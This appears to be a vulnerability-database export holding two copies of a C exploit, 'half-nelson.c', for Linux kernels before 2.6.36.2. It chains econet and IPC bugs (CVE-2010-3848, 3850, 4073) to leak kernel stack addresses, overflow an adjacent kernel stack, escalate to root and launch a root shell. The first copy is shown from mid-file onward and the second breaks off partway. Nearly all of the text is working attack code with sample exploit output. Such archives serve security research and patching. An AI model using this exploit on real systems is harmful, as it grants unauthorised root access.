<sys/sem.h>\r\n#include <sys/stat.h>\r\n#include <sys/mman.h>\r\n#include <sys/resource.h>\r\n#include <sys/syscall.h>\r\n#include <netinet/in.h>\r\n#include <net/if.h>\r\n \r\n#define IOVS 446\r\n#define NPROC 1024\r\n#define KSTACK_SIZE 8192\r\n \r\n#define KSTACK_UNINIT 0\r\n#define KSTACK_UPPER 1\r\n#define KSTACK_LOWER 2\r\n#define KSTACK_DIE 3\r\n#define KSTACK_PARENT 4\r\n#define KSTACK_CLOBBER 5\r\n \r\n#define LEAK_BASE 0xffff880000000000\r\n#define LEAK_TOP 0xffff8800c0000000\r\n#define LEAK_DEPTH 500\r\n#define LEAK_OFFSET 32\r\n \r\n#define NR_IPC 0x75\r\n#define NR_WAIT4 0x72\r\n#define SEMCTL 0x3\r\n \r\n#ifndef PF_ECONET\r\n#define PF_ECONET 19\r\n#endif\r\n \r\n#define STACK_OFFSET 6\r\n#define RESTART_OFFSET 40\r\n \r\nstruct ec_addr {\r\n unsigned char station;\r\n unsigned char net;\r\n};\r\n \r\nstruct sockaddr_ec {\r\n unsigned short sec_family;\r\n unsigned char port;\r\n unsigned char cb;\r\n unsigned char type;\r\n struct ec_addr addr;\r\n unsigned long cookie;\r\n};\r\n \r\nstruct ipc64_perm {\r\n uint32_t key;\r\n 
uint32_t uid;\r\n uint32_t gid;\r\n uint32_t cuid;\r\n uint32_t cgid;\r\n uint32_t mode;\r\n uint16_t seq;\r\n uint16_t __pad2;\r\n unsigned long __unused1;\r\n unsigned long __unused2;\r\n};\r\n \r\nstruct semid64_ds {\r\n struct ipc64_perm sem_perm;\r\n unsigned long sem_otime;\r\n unsigned long __unused1;\r\n unsigned long sem_ctime;\r\n unsigned long __unused;\r\n unsigned long sem_nsems;\r\n unsigned long __unused3;\r\n unsigned long __unused4;\r\n};\r\n \r\nunion semun {\r\n int val;\r\n struct semid_ds *buf;\r\n unsigned short *array;\r\n struct seminfo *__buf;\r\n};\r\n \r\nstruct region {\r\n unsigned long parent;\r\n unsigned long addrs[NPROC];\r\n};\r\nstruct region *region;\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long ia32_sysret;\r\n \r\nvoid __attribute__((regparm(3)))\r\nkernel_code(void)\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nvoid\r\npayload_parent(void)\r\n{\r\n asm volatile (\r\n "mov $kernel_code, %rax\\n"\r\n "call *%rax\\n"\r\n );\r\n}\r\n \r\nvoid\r\npayload_child(void)\r\n{\r\n asm volatile (\r\n "movq $payload_parent, (%0)\\n"\r\n "jmpq *%1\\n"\r\n :\r\n : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)\r\n );\r\n}\r\n \r\nunsigned long\r\nget_kstack(void)\r\n{\r\n int i, size, offset;\r\n union semun *arg;\r\n struct semid_ds dummy;\r\n struct semid64_ds *leaked;\r\n char *stack_start, *stack_end;\r\n unsigned char *p;\r\n unsigned long kstack, *ptr;\r\n \r\n /* make sure our argument is 32-bit accessible */\r\n arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\r\n if (arg == MAP_FAILED) {\r\n printf("[-] failure mapping memory, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n /* map a fake stack to use during syscall */\r\n stack_start = 
mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\r\n if (stack_start == MAP_FAILED) {\r\n printf("[-] failure mapping memory, aborting!\\n");\r\n exit(1);\r\n }\r\n stack_end = stack_start + 4096;\r\n \r\n memset(arg, 0, sizeof(union semun));\r\n memset(&dummy, 0, sizeof(struct semid_ds));\r\n arg->buf = &dummy;\r\n \r\n /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */\r\n asm volatile (\r\n "push %%rax\\n"\r\n "push %%rbx\\n"\r\n "push %%rcx\\n"\r\n "push %%rdx\\n"\r\n "push %%rsi\\n"\r\n "push %%rdi\\n"\r\n "movl %0, %%eax\\n"\r\n "movl %1, %%ebx\\n"\r\n "movl %2, %%ecx\\n"\r\n "movl %3, %%edx\\n"\r\n "movl %4, %%esi\\n"\r\n "movq %5, %%rdi\\n"\r\n "movq %%rsp, %%r8\\n"\r\n "movq %6, %%rsp\\n"\r\n "push %%r8\\n"\r\n "int $0x80\\n"\r\n "pop %%r8\\n"\r\n "movq %%r8, %%rsp\\n"\r\n "pop %%rdi\\n"\r\n "pop %%rsi\\n"\r\n "pop %%rdx\\n"\r\n "pop %%rcx\\n"\r\n "pop %%rbx\\n"\r\n "pop %%rax\\n"\r\n :\r\n : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)\r\n : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"\r\n );\r\n \r\n /* naively extract a pointer to the kstack from the kstack */\r\n p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;\r\n kstack = *(unsigned long *) p;\r\n \r\n if (kstack < LEAK_BASE || kstack > LEAK_TOP) {\r\n printf("[-] failed to leak a suitable kstack address, try again!\\n");\r\n exit(1);\r\n }\r\n if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {\r\n printf("[-] failed to leak a suitable kstack address, try again!\\n");\r\n exit(1);\r\n }\r\n \r\n kstack = kstack & ~0x1fff;\r\n \r\n return kstack;\r\n}\r\n \r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy, sym[512];\r\n int ret = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (!f) {\r\n return 0;\r\n }\r\n \r\n while (ret != EOF) {\r\n ret = fscanf(f, "%p %c %s\\n", (void **) &addr, &dummy, sym);\r\n if (ret == 0) {\r\n 
fscanf(f, "%s\\n", sym);\r\n continue;\r\n }\r\n if (!strcmp(name, sym)) {\r\n printf("[+] resolved symbol %s to %p\\n", name, (void *) addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n \r\n return 0;\r\n}\r\n \r\nint\r\nget_adjacent_kstacks(void)\r\n{\r\n int i, ret, shm, pid, type;\r\n \r\n /* create shared communication channel between parent and its children */\r\n shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);\r\n if (shm < 0) {\r\n printf("[-] failed creating shared memory, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n ret = ftruncate(shm, sizeof(struct region));\r\n if (ret != 0) {\r\n printf("[-] failed resizing shared memory, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);\r\n memset(region, KSTACK_UNINIT, sizeof(struct region));\r\n \r\n /* parent kstack self-discovery */\r\n region->parent = get_kstack();\r\n \r\n printf("[+] found parent kstack at 0x%lx\\n", region->parent);\r\n \r\n /* fork and discover children with adjacently-allocated kernel stacks */\r\n for (i = 0; i < NPROC; ++i) {\r\n pid = fork();\r\n \r\n if (pid > 0) {\r\n type = KSTACK_PARENT;\r\n continue;\r\n } else if (pid == 0) {\r\n /* children do kstack self-discovery */\r\n region->addrs[i] = get_kstack();\r\n \r\n /* children sleep until parent has found adjacent children */\r\n while (1) {\r\n sleep(1);\r\n if (region->addrs[i] == KSTACK_DIE) {\r\n /* parent doesn't need us :-( */\r\n exit(0);\r\n } else if (region->addrs[i] == KSTACK_UPPER) {\r\n /* we're the upper adjacent process */\r\n type = KSTACK_UPPER;\r\n break;\r\n } else if (region->addrs[i] == KSTACK_LOWER) {\r\n /* we're the lower adjacent process */\r\n type = KSTACK_LOWER;\r\n break;\r\n }\r\n }\r\n break;\r\n } else {\r\n printf("[-] fork failed, aborting!\\n");\r\n exit(1);\r\n }\r\n }\r\n \r\n return type;\r\n}\r\n \r\nvoid\r\ndo_parent(void)\r\n{\r\n int i, j, upper, lower;\r\n \r\n 
/* parent sleeps until we've discovered all the child kstacks */\r\n while (1) {\r\n sleep(1);\r\n for (i = 0; i < NPROC; ++i) {\r\n if (region->addrs[i] == KSTACK_UNINIT) {\r\n break;\r\n }\r\n }\r\n if (i == NPROC) {\r\n break;\r\n }\r\n }\r\n \r\n /* figure out if we have any adjacent child kstacks */\r\n for (i = 0; i < NPROC; ++i) {\r\n for (j = 0; j < NPROC; ++j) {\r\n if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {\r\n break;\r\n }\r\n }\r\n if (j != NPROC) {\r\n break;\r\n }\r\n }\r\n if (i == NPROC && j == NPROC) {\r\n printf("[-] failed to find adjacent kstacks, try again!\\n");\r\n exit(1);\r\n }\r\n \r\n upper = i;\r\n lower = j;\r\n \r\n printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\\n", region->addrs[lower], region->addrs[upper]);\r\n \r\n /* signal to non-adjacent children to die */\r\n for (i = 0; i < NPROC; ++i) {\r\n if (i != upper && i != lower) {\r\n region->addrs[i] = KSTACK_DIE;\r\n }\r\n }\r\n \r\n /* signal adjacent children to continue on */\r\n region->addrs[upper] = KSTACK_UPPER;\r\n region->addrs[lower] = KSTACK_LOWER;\r\n \r\n /* parent sleeps until child has clobbered the fptr */\r\n while (1) {\r\n sleep(1);\r\n if (region->parent == KSTACK_CLOBBER) {\r\n break;\r\n }\r\n }\r\n \r\n printf("[+] escalating privileges...\\n");\r\n \r\n /* trigger our clobbered fptr */\r\n syscall(__NR_restart_syscall);\r\n \r\n /* our privileges should be escalated now */\r\n if (getuid() != 0) {\r\n printf("[-] privilege escalation failed, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] launching root shell!\\n");\r\n \r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n \r\nvoid\r\ndo_child_upper(void)\r\n{\r\n int i, ret, eco_sock;\r\n struct sockaddr_ec eco_addr;\r\n struct msghdr eco_msg;\r\n struct iovec iovs[IOVS];\r\n struct ifreq ifr;\r\n char *target;\r\n \r\n /* calculate payload target, skip prologue */\r\n target = (char *) payload_child;\r\n target += 4;\r\n \r\n /* give lower child a chance to enter its wait4 
call */\r\n sleep(1);\r\n \r\n /* write some zeros */\r\n for (i = 0; i < STACK_OFFSET; ++i) {\r\n iovs[i].iov_base = (void *) 0x0;\r\n iovs[i].iov_len = 0;\r\n }\r\n \r\n /* overwrite saved ia32_sysret address on stack */\r\n iovs[STACK_OFFSET].iov_base = (void *) target;\r\n iovs[STACK_OFFSET].iov_len = 0x0246;\r\n \r\n /* force abort via EFAULT */\r\n for (i = STACK_OFFSET + 1; i < IOVS; ++i) {\r\n iovs[i].iov_base = (void *) 0xffffffff00000000;\r\n iovs[i].iov_len = 0;\r\n }\r\n \r\n /* create econet socket */\r\n eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n if (eco_sock < 0) {\r\n printf("[-] failed creating econet socket, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n memset(&ifr, 0, sizeof(ifr));\r\n strcpy(ifr.ifr_name, "lo");\r\n \r\n /* trick econet into associated with the loopback */\r\n ret = ioctl(eco_sock, SIOCSIFADDR, &ifr);\r\n if (ret != 0) {\r\n printf("[-] failed setting interface address, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n memset(&eco_addr, 0, sizeof(eco_addr));\r\n memset(&eco_msg, 0, sizeof(eco_msg));\r\n eco_msg.msg_name = &eco_addr;\r\n eco_msg.msg_namelen = sizeof(eco_addr);\r\n eco_msg.msg_flags = 0;\r\n eco_msg.msg_iov = &iovs[0];\r\n eco_msg.msg_iovlen = IOVS;\r\n \r\n printf("[+] upper child triggering stack overflow...\\n");\r\n \r\n /* trigger the kstack overflow into lower child's kstack */\r\n ret = sendmsg(eco_sock, &eco_msg, 0);\r\n if (ret != -1 || errno != EFAULT) {\r\n printf("[-] sendmsg succeeded unexpectedly, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n close(eco_sock);\r\n}\r\n \r\nvoid\r\ndo_child_lower(void)\r\n{\r\n int pid;\r\n \r\n printf("[+] lower child spawning a helper...\\n");\r\n \r\n /* fork off a helper to wait4 on */\r\n pid = fork();\r\n if (pid == 0) {\r\n printf("[+] helper going to sleep...\\n");\r\n sleep(5);\r\n printf("[+] helper woke up\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] lower child calling compat_sys_wait4 on helper...\\n");\r\n \r\n /* syscall(NR_WAIT4, pid, 0, 0, 0) */\r\n asm 
volatile (\r\n "push %%rax\\n"\r\n "push %%rbx\\n"\r\n "push %%rcx\\n"\r\n "push %%rdx\\n"\r\n "push %%rsi\\n"\r\n "movl %0, %%eax\\n"\r\n "movl %1, %%ebx\\n"\r\n "movl %2, %%ecx\\n"\r\n "movl %3, %%edx\\n"\r\n "movl %4, %%esi\\n"\r\n "int $0x80\\n"\r\n "pop %%rsi\\n"\r\n "pop %%rdx\\n"\r\n "pop %%rcx\\n"\r\n "pop %%rbx\\n"\r\n "pop %%rax\\n"\r\n :\r\n : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)\r\n : "memory", "rax", "rbx", "rcx", "rdx", "rsi"\r\n );\r\n \r\n printf("[+] lower child returned from compat_sys_wait4\\n");\r\n \r\n printf("[+] parent's restart_block has been clobbered\\n");\r\n \r\n /* signal parent that our fptr should now be clobbered */\r\n region->parent = KSTACK_CLOBBER;\r\n}\r\n \r\nint\r\nmain(int argc, char **argv)\r\n{\r\n int type;\r\n \r\n if (sizeof(unsigned long) != 8) {\r\n printf("[-] x86_64 only, sorry!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] looking for symbols...\\n");\r\n \r\n commit_creds = (_commit_creds) get_symbol("commit_creds");\r\n if (!commit_creds) {\r\n printf("[-] symbol table not available, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");\r\n if (!prepare_kernel_cred) {\r\n printf("[-] symbol table not available, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n ia32_sysret = get_symbol("ia32_sysret");\r\n if (!ia32_sysret) {\r\n printf("[-] symbol table not available, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] spawning children to achieve adjacent kstacks...\\n");\r\n \r\n type = get_adjacent_kstacks();\r\n \r\n if (type == KSTACK_PARENT) {\r\n do_parent();\r\n } else if (type == KSTACK_UPPER) {\r\n do_child_upper();\r\n } else if (type == KSTACK_LOWER) {\r\n do_child_lower();\r\n }\r\n \r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20924", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:28:36", "description": "No 
description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3848", "CVE-2010-3850", "CVE-2010-4073"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72066", "id": "SSV:72066", "sourceData": "\n /*\r\n * half-nelson.c\r\n *\r\n * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848\r\n *\r\n * Stack-based buffer overflow in the econet_sendmsg function in \r\n * net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an \r\n * econet address is configured, allows local users to gain privileges by \r\n * providing a large number of iovec structures.\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850\r\n *\r\n * The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel \r\n * before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which \r\n * allows local users to bypass intended access restrictions and configure \r\n * econet addresses via an SIOCSIFADDR ioctl call.\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073\r\n *\r\n * The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not \r\n * initialize certain structures, which allows local users to obtain \r\n * potentially sensitive information from kernel stack memory.\r\n *\r\n * Usage:\r\n *\r\n * $ gcc half-nelson.c -o half-nelson -lrt\r\n * $ ./half-nelson\r\n * [+] looking for symbols...\r\n * [+] resolved symbol commit_creds to 0xffffffff81088ad0\r\n * [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0\r\n * [+] resolved symbol ia32_sysret to 0xffffffff81046692\r\n * [+] spawning children to achieve adjacent kstacks...\r\n * [+] found 
parent kstack at 0xffff88001c6ca000\r\n * [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000\r\n * [+] lower child spawning a helper...\r\n * [+] lower child calling compat_sys_wait4 on helper...\r\n * [+] helper going to sleep...\r\n * [+] upper child triggering stack overflow...\r\n * [+] helper woke up\r\n * [+] lower child returned from compat_sys_wait4\r\n * [+] parent's restart_block has been clobbered\r\n * [+] escalating privileges...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root)\r\n *\r\n * Notes:\r\n *\r\n * This exploit leverages three vulnerabilities to escalate privileges. \r\n * The primary vulnerability is a kernel stack overflow, not a stack buffer \r\n * overflow as the CVE description incorrectly states. I believe this is the\r\n * first public exploit for a kernel stack overflow, and it turns out to be \r\n * a bit tricky due to some particulars of the econet vulnerability. A full \r\n * breakdown of the exploit is forthcoming.\r\n *\r\n * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <stddef.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <syscall.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/wait.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/mman.h>\r\n#include <sys/ipc.h>\r\n#include <sys/sem.h>\r\n#include <sys/stat.h>\r\n#include <sys/mman.h>\r\n#include <sys/resource.h>\r\n#include <sys/syscall.h>\r\n#include <netinet/in.h>\r\n#include <net/if.h>\r\n\r\n#define IOVS 446\r\n#define NPROC 1024\r\n#define KSTACK_SIZE 8192\r\n\r\n#define KSTACK_UNINIT 0\r\n#define KSTACK_UPPER 1\r\n#define KSTACK_LOWER 2\r\n#define KSTACK_DIE 3\r\n#define KSTACK_PARENT 4\r\n#define KSTACK_CLOBBER 5\r\n\r\n#define LEAK_BASE 0xffff880000000000\r\n#define LEAK_TOP 
0xffff8800c0000000\r\n#define LEAK_DEPTH 500\r\n#define LEAK_OFFSET 32 \r\n\r\n#define NR_IPC 0x75\r\n#define NR_WAIT4 0x72\r\n#define SEMCTL 0x3\r\n\r\n#ifndef PF_ECONET\r\n#define PF_ECONET 19\r\n#endif\r\n\r\n#define STACK_OFFSET 6\r\n#define RESTART_OFFSET 40\r\n\r\nstruct ec_addr {\r\n\tunsigned char station;\r\n\tunsigned char net;\r\n};\r\n\r\nstruct sockaddr_ec {\r\n\tunsigned short sec_family;\r\n\tunsigned char port;\r\n\tunsigned char cb;\r\n\tunsigned char type;\r\n\tstruct ec_addr addr;\r\n\tunsigned long cookie;\r\n};\r\n\r\nstruct ipc64_perm {\r\n\tuint32_t key;\r\n\tuint32_t uid;\r\n\tuint32_t gid;\r\n\tuint32_t cuid;\r\n\tuint32_t cgid;\r\n\tuint32_t mode;\r\n\tuint16_t seq;\r\n\tuint16_t __pad2;\r\n\tunsigned long __unused1;\r\n\tunsigned long __unused2;\r\n};\r\n\r\nstruct semid64_ds {\r\n\tstruct ipc64_perm sem_perm;\r\n\tunsigned long sem_otime;\r\n\tunsigned long __unused1;\r\n\tunsigned long sem_ctime;\r\n\tunsigned long __unused;\r\n\tunsigned long sem_nsems;\r\n\tunsigned long __unused3;\r\n\tunsigned long __unused4;\r\n};\r\n\r\nunion semun {\r\n\tint val;\r\n\tstruct semid_ds *buf;\r\n\tunsigned short *array;\r\n\tstruct seminfo *__buf;\r\n};\r\n\r\nstruct region {\r\n\tunsigned long parent;\r\n\tunsigned long addrs[NPROC];\r\n};\r\nstruct region *region;\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long ia32_sysret;\r\n \r\nvoid __attribute__((regparm(3)))\r\nkernel_code(void)\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\nvoid\r\npayload_parent(void)\r\n{\r\n\tasm volatile (\r\n\t\t"mov $kernel_code, %rax\\n"\r\n\t\t"call *%rax\\n"\r\n\t);\r\n}\r\n\r\nvoid\r\npayload_child(void)\r\n{\r\n\tasm volatile (\r\n\t\t"movq $payload_parent, (%0)\\n"\r\n\t\t"jmpq *%1\\n"\r\n\t\t:\r\n\t\t: "r"(region->parent + 
RESTART_OFFSET), "r"(ia32_sysret)\r\n\t);\r\n}\r\n\r\nunsigned long\r\nget_kstack(void)\r\n{\r\n\tint i, size, offset;\r\n\tunion semun *arg;\r\n\tstruct semid_ds dummy;\r\n\tstruct semid64_ds *leaked;\r\n\tchar *stack_start, *stack_end;\r\n\tunsigned char *p;\r\n\tunsigned long kstack, *ptr;\r\n\r\n\t/* make sure our argument is 32-bit accessible */\r\n\targ = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\r\n\tif (arg == MAP_FAILED) {\r\n\t\tprintf("[-] failure mapping memory, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* map a fake stack to use during syscall */\r\n\tstack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\r\n\tif (stack_start == MAP_FAILED) {\r\n\t\tprintf("[-] failure mapping memory, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\tstack_end = stack_start + 4096;\r\n\r\n\tmemset(arg, 0, sizeof(union semun));\r\n\tmemset(&dummy, 0, sizeof(struct semid_ds));\r\n\targ->buf = &dummy;\r\n\r\n\t/* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */\r\n\tasm volatile (\r\n\t\t"push %%rax\\n"\r\n\t\t"push %%rbx\\n"\r\n\t\t"push %%rcx\\n"\r\n\t\t"push %%rdx\\n"\r\n\t\t"push %%rsi\\n"\r\n\t\t"push %%rdi\\n"\r\n\t\t"movl %0, %%eax\\n"\r\n\t\t"movl %1, %%ebx\\n"\r\n\t\t"movl %2, %%ecx\\n"\r\n\t\t"movl %3, %%edx\\n"\r\n\t\t"movl %4, %%esi\\n"\r\n\t\t"movq %5, %%rdi\\n"\r\n\t\t"movq %%rsp, %%r8\\n"\r\n\t\t"movq %6, %%rsp\\n"\r\n\t\t"push %%r8\\n"\r\n\t\t"int $0x80\\n"\r\n\t\t"pop %%r8\\n"\r\n\t\t"movq %%r8, %%rsp\\n"\r\n\t\t"pop %%rdi\\n"\r\n\t\t"pop %%rsi\\n"\r\n\t\t"pop %%rdx\\n"\r\n\t\t"pop %%rcx\\n"\r\n\t\t"pop %%rbx\\n"\r\n\t\t"pop %%rax\\n"\r\n\t\t:\r\n\t\t: "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)\r\n\t\t: "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"\r\n\t);\r\n\r\n\t/* naively extract a pointer to the kstack from the kstack */\r\n\tp = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + 
LEAK_OFFSET;\r\n\tkstack = *(unsigned long *) p;\r\n\r\n\tif (kstack < LEAK_BASE || kstack > LEAK_TOP) {\r\n\t\tprintf("[-] failed to leak a suitable kstack address, try again!\\n");\r\n\t\texit(1);\r\n\t}\r\n\tif ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {\r\n\t\tprintf("[-] failed to leak a suitable kstack address, try again!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tkstack = kstack & ~0x1fff;\r\n\t\r\n\treturn kstack;\r\n}\r\n\r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy, sym[512];\r\n\tint ret = 0;\r\n \r\n\tf = fopen("/proc/kallsyms", "r");\r\n\tif (!f) {\r\n\t\treturn 0;\r\n\t}\r\n \r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, "%p %c %s\\n", (void **) &addr, &dummy, sym);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, "%s\\n", sym);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sym)) {\r\n\t\t\tprintf("[+] resolved symbol %s to %p\\n", name, (void *) addr);\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\tfclose(f);\r\n \r\n\treturn 0;\r\n}\r\n\r\nint\r\nget_adjacent_kstacks(void)\r\n{\r\n\tint i, ret, shm, pid, type;\r\n\r\n\t/* create shared communication channel between parent and its children */\r\n\tshm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);\r\n\tif (shm < 0) {\r\n\t\tprintf("[-] failed creating shared memory, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = ftruncate(shm, sizeof(struct region));\r\n\tif (ret != 0) {\r\n\t\tprintf("[-] failed resizing shared memory, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tregion = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);\r\n\tmemset(region, KSTACK_UNINIT, sizeof(struct region));\r\n\r\n\t/* parent kstack self-discovery */\r\n\tregion->parent = get_kstack();\r\n\r\n\tprintf("[+] found parent kstack at 0x%lx\\n", region->parent);\r\n\r\n\t/* fork and discover children with adjacently-allocated kernel stacks */\r\n\tfor (i = 0; i < NPROC; ++i) {\r\n\t\tpid = 
fork();\r\n\r\n\t\tif (pid > 0) {\r\n\t\t\ttype = KSTACK_PARENT;\r\n\t\t\tcontinue;\r\n\t\t} else if (pid == 0) {\r\n\t\t\t/* children do kstack self-discovery */\r\n\t\t\tregion->addrs[i] = get_kstack();\r\n\r\n\t\t\t/* children sleep until parent has found adjacent children */\r\n\t\t\twhile (1) {\r\n\t\t\t\tsleep(1);\r\n\t\t\t\tif (region->addrs[i] == KSTACK_DIE) {\r\n\t\t\t\t\t/* parent doesn't need us :-( */\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t} else if (region->addrs[i] == KSTACK_UPPER) {\r\n\t\t\t\t\t/* we're the upper adjacent process */\r\n\t\t\t\t\ttype = KSTACK_UPPER;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t} else if (region->addrs[i] == KSTACK_LOWER) {\r\n\t\t\t\t\t/* we're the lower adjacent process */\r\n\t\t\t\t\ttype = KSTACK_LOWER;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\t} else {\r\n\t\t\tprintf("[-] fork failed, aborting!\\n");\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\treturn type;\r\n}\r\n\r\nvoid\r\ndo_parent(void)\r\n{\r\n\tint i, j, upper, lower;\r\n\r\n\t/* parent sleeps until we've discovered all the child kstacks */\r\n\twhile (1) {\r\n\t\tsleep(1);\r\n\t\tfor (i = 0; i < NPROC; ++i) {\r\n\t\t\tif (region->addrs[i] == KSTACK_UNINIT) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (i == NPROC) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\t/* figure out if we have any adjacent child kstacks */\r\n\tfor (i = 0; i < NPROC; ++i) {\r\n\t\tfor (j = 0; j < NPROC; ++j) {\r\n\t\t\tif (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (j != NPROC) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif (i == NPROC && j == NPROC) {\r\n\t\tprintf("[-] failed to find adjacent kstacks, try again!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tupper = i;\r\n\tlower = j;\r\n\r\n\tprintf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\\n", region->addrs[lower], region->addrs[upper]);\r\n\r\n\t/* signal to non-adjacent children to die */\r\n\tfor (i = 0; i < NPROC; ++i) {\r\n\t\tif (i != upper && i != lower) 
